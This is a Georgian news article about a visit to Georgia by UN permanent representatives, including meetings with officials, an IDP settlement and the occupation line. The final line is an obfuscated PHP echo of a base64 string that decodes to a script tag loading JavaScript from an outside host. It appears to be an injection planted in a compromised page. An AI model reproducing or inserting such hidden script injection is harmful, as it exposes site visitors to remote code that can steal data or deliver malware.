celsiusi
ავერსი შნაიდერი

30 აპრილიდან 5 მაისის ჩათვლით საქართველოს ვიზიტით გაერო-ში სხვადასხვა ქვეყნის მუდმივი წარმომადგენლები სტუმრობენ, – ინფორმაციას საქართველოს საგარეო საქმეთა სამინისტრო ავრცელებს.

უწყების ცნობით, ვიზიტის ფარგლებში უცხოელ დიპლომატებს საგარეო საქმეთა მინისტრმა, ილია დარჩიაშვილმა უმასპინძლა. არაფორმალურ გარემოში გამართულ შეხვედრაზე მხარეებმა ისაუბრეს საქართველოს საგარეო პოლიტიკურ მისწრაფებებზე, ქვეყანაში მიმდინარე რეფორმებსა და საქართველოს თანამშრომლობაზე როგორც გაერო-სთან, ისე ორგანიზაციის წევრ ქვეყნებთან.

„ელჩების საქართველოში ვიზიტის ფარგლებში დაგეგმილია შეხვედრები საქართველოს საკანონმდებლო და აღმასრულებელი ხელისუფლების წარმომადგენლებთან, მათ შორის პრემიერ-მინისტრ ირაკლი ღარიბაშვილთან და პარლამენტის თავმჯდომარე შალვა პაპუაშვილთან. შეხვედრებზე მხარეები განიხილავენ საქართველოში სახელმწიფო მმართველობის სფეროში გატარებულ რეფორმებსა და ეკონომიკური მიმართულებით გადადგმულ მნიშვნელოვან ნაბიჯებს.

გარდა ამისა, დიპლომატები მოინახულებენ წეროვანში არსებულ იძულებით გადაადგილებულ პირთა დასახლებას, შემდეგ კი საოკუპაციო ხაზის მიმდებარედ, სოფელ ოძისს ეწვევიან, სადაც გაეცნობიან ადგილზე არსებულ ვითარებას.

საქართველოში ვიზიტის ფარგლებში, ელჩები ასევე გაემგზავრებიან ბათუმში, სადაც გაიმართება შეხვედრა აჭარის ავტონომიური რესპუბლიკის მთავრობის წარმომადგენლებთან“, – აღნიშნულია საქართველოს საგარეო უწყების მიერ გავრცელებულ ინფორმაციაში.

306
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");